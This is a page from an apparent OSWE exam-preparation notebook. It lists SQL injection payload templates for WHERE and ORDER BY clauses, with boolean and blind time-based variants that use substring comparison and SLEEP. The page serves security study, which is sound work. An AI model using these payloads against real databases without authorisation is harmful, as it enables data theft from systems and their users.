AWAE - OSWE Preparation / Resources
  • TL;DR
  • General
    • Resources
      • BurpSuite
      • WhiteBox
    • POCs
      • Deserialization
        • PHP
        • Java
          • Ysoserial
      • SQL Injection
      • Type Juggling
      • CSRF
  • By Vulnerability
    • SQL Injection
      • Summary
      • Types
      • Injection by clause
      • Bypassing Character Restrictions
      • By Language
        • JAVA
          • Regex
          • Summary
      • Regex
      • Resources
    • Deserialization
      • By Language
        • PHP
          • Regex
          • Summary
          • Practice
        • JAVA
          • Regex
          • Summary
          • Practice
          • Resources
        • .NET
          • Regex
          • Summary
          • Resources
      • Resources
    • XSS
    • XXE
      • By Language
        • PHP
          • Practice
          • Resources
        • Java
          • Vulnerable Libraries' Implementation
      • Resources
    • SSTI
      • Summary
      • Practice
      • Resources
    • File Upload Restrictions Bypass
      • Tricks
      • File Extension Filters Bypass List
      • Resources
  • REGEX
  • By Language
    • PHP
      • Regex
      • Type Juggling
        • Summary
        • Practice
    • Java
      • Decompiling
      • Compiling & Running
    • NodeJS
      • Practice
  • Random
  • Other Repositories
Powered by GitBook
On this page
  • WHERE (most common)
  • Boolean
  • Blind Time-Based
  • ORDER BY
  • Boolean
  • Blind Time-Based

Was this helpful?

  1. By Vulnerability
  2. SQL Injection

Injection by clause

A list of payloads to propperly understand how the injection can be undertaken depending on the clause.

PreviousTypesNextBypassing Character Restrictions

Last updated 4 years ago

Was this helpful?

WHERE (most common)

Boolean

[...] WHERE [.] AND ASCII(SUBSTR((SUBQUERY),X,X))=Y;

Blind Time-Based

[...] WHERE [.] AND ASCII(SUBSTR((SUBQUERY),X,X))=Y AND SLEEP(1337);

ORDER BY

Boolean

[...] WHERE [.] ORDER BY (SELECT (CASE WHEN EXISTS(SUBQUERY) THEN column1 ELSE column2 END));
  • Depending on the order of the displayed contents, the subquery would be true or false.

  • Extra information .

Blind Time-Based

[...] WHERE [.] ORDER BY (SUBQUERY AND sleep(1337));
  • The provided seconds to the sleep function would be multiplied to the returning rows of the main query.

here